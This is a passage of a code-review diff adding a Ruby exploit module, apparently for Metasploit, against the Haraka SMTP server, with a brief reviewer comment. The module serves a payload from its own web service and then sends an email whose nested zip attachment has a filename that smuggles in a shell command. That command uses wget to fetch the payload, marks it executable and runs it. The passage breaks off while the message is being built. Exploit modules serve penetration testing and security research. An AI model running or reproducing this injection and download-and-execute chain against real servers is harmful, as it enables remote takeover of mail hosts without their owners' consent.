modules/exploits/linux/smtp/harakiri.rb

```diff
@@ -0,0 +1,256 @@
+    else
+
+      #do not use SSL
+      if datastore['SSL']
+        ssl_restore = true
+        datastore['SSL'] = false
+      end
+
+      #we use SRVHOST as download IP for the coming wget command.
+      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+        srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
+      else
+        srv_host = datastore['SRVHOST']
+      end
+
+      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+      service_url_payload = srv_host + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      start_service({'Uri' => {
+        'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+        'Path' => resource_uri
+      }})
+
+      datastore['SSL'] = true if ssl_restore
+    end
+
+  cmd = "/usr/bin/wget #{service_url} -O /tmp/#{downfile};chmod 777 /tmp/#{downfile};/tmp/#{downfile}"
+  print_status(cmd)
+  connect
+
+
+    print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
+    if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Haraka /
+      disconnect
+      fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Haraka!")
+    end
+    #
+    # Initiate the message
+    from = datastore['MAILFROM']
+    to   = datastore['MAILTO']
+    ehlo = datastore['EHLO']
+
+  ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
+    ehlo_resp.each_line do |line|
+      print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
+    end
+
+  resp = raw_send_recv("MAIL FROM: #{from}\r\n")
+    resp ||= 'no response'
+    msg = "MAIL: #{resp.strip}"
+    if not resp or resp[0,3] != '250'
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
+    else
+      print_status("#{rhost}:#{rport} - #{msg}")
+    end
+
+    # connected lets start mailing
+    resp = raw_send_recv("RCPT TO: #{to}\r\n")
+    resp ||= 'no response'
+    msg = "RCPT: #{resp.strip}"
+    if not resp or resp[0,3] != '250'
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
+    else
+      print_status("#{rhost}:#{rport} - #{msg}")
+    end
+
+    resp = raw_send_recv("DATA\r\n")
+    resp ||= 'no response'
+    msg = "DATA: #{resp.strip}"
+    if not resp or resp[0,3] != '354'
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
+    else
+      print_status("#{rhost}:#{rport} - #{msg}")
+    end
+
+  stringib = Zip::OutputStream.write_buffer do |zib|
+      zib.put_next_entry("harakiri.txt")
+      zib.write "Hello world!"
+  end
+
+  stringia = Zip::OutputStream.write_buffer do |zia|
+      zia.put_next_entry("a\";#{cmd};echo \"a.zip")
+      zia.write stringib.string
+  end
+
+    message  = "Content-Type: multipart/mixed; boundary='===============1434375302937503704=='\r\n"
+    message <<  "MIME-Version: 1.0\r\n"
+    message << "Subject: harakiri\r\n"
```

Comment:
will combine this with the randomness for MAILTO / MAILFROM if not set in a later update.